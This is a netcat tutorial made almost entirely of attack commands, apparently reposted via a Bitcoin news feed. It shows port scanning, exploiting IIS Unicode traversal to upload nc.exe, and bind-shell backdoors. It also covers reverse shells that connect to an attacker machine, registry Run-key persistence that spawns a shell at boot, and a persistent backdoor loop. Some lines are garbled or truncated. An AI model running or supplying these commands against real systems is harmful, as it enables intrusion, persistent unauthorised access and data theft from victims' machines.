Netcat tutorials

Netcat tutorials
Port scanning 1 through 200:

nc -v -w2 -z 192.168.0.2 1-200

-------------------------------

Banner grabbing with nc:

nc -v -n 192.168.0.2 80

------------------------------
IIS Unicode File Traversal:

https://ift.tt/2LBXtt1

Now we want to upload nc.exe to the vulnerable IIS server:

https://ift.tt/2KYD93W


we used:
tftp -I 192.168.1.9 GET nc.exe
is transformed into:
http://<exploit URL>/c+TFTP+-i+192.168.1.9+GET+nc.exe

as a TFTP server we can use: TFTPD32 by Ph. Jounin

---------------------------------

Netcat as a backdoor:

now we have nc.exe on the server and we want to create a backdoor to get a remote shell.

nc -L -p 1001 -d -e cmd.exe

-L -> do not close and wait for connections.
-p -> port
-d -> detach from the process we want it to run.
-e -> what program to run once the port is connected to (cmd.exe ).

If we not want to convert this command for Unicode URL use, it will look like this:

http://<exploir URL>/c+nc+-L+-p+1001+-d+-e+cmd.exe

ex:
nc -v 192.168.80.14 80

GET https://ift.tt/2LDZwwv

------------------------------------------------------

Transferring File with nc.exe:

We want to transfer a file called hack.txt to the IIS Server and we don't want to use TFTP .We can use nc.exe to transfer the file.

To receive a file named hack.txt on the destination system start Netcat on the IIS server with the following command:
nc -l -p 1234>hack.txt

On our source system ( the attacking computer ) we send a file named hack.txt to the IIS machine with the following
command:

nc destination 1234<hack.txt

#################

Server side: nc -L -p [PORT] -e cmd.exe
Client side: nc -vv [IP] [PORT]

On the victim computer.

reg add hklm\software\microsoft\windows\currentversion\run /v capture /t reg_sz /d "nc 192.168.1.68 10001 -d -e cmd.exe"

Remember 192.168.1.68 is the attacker machine.

And on the attacker machine just listen.

nc -vv -l -p 10001

You should listen on your machine, and when the victim boots up, nc will connect to you, and will spawn a reverse shell to you.

The command prompt popup should come up for a second and disapper.

Oh you should put nc in the system32 directory, so you don't have to specify where nc is located. All you have to do then is type nc in any directory.

-l waits for connection.
-p port to listen on.
-d detach from the process.
-e which program to execute.
-w timeout for connection.
-v verbose [use twice to be more verbose] 

Now we can see that the file has been transferred to the target system, via port 1234.
###############

Netcat fun tricks:

Data Transfer (Pull):
server: nc -l -p [port] < [filename]
client: nc [server ip] [server port] > [filename]

Data Transfer (Push):
server: nc -l -p [port] > [filename]
client: nc [server ip] [server port] < [filename]

Backdoors:
unix: nc -l -p [port] -e /bin/sh
windows: nc -l -p [port] -e cmd.exe

Persistant Backdoor:
while [ 1 ]; nc -l -p [port] -e /bin/sh; done

Reverse Shell
server (attacker): nc -l -p [port]
client (victim): nc [server ip] [server port] -e [shell]

Backdoor Client:
nc [server ip] [port]

Traffic Relay on Linux:
mknod backpipe p
nc -l -p [incoming port] 0backpipe

Traffic Replay:
nc [targetip] [port] < [filename]


reg add hklm\software\microsoft\windows\currentversion\run /v capture /t reg_sz /d "c:\tmp\nc.exe -l -p 6666"

##############

from BITCOIN NEWS https://ift.tt/2xfCzwu
via Bitcoin News Update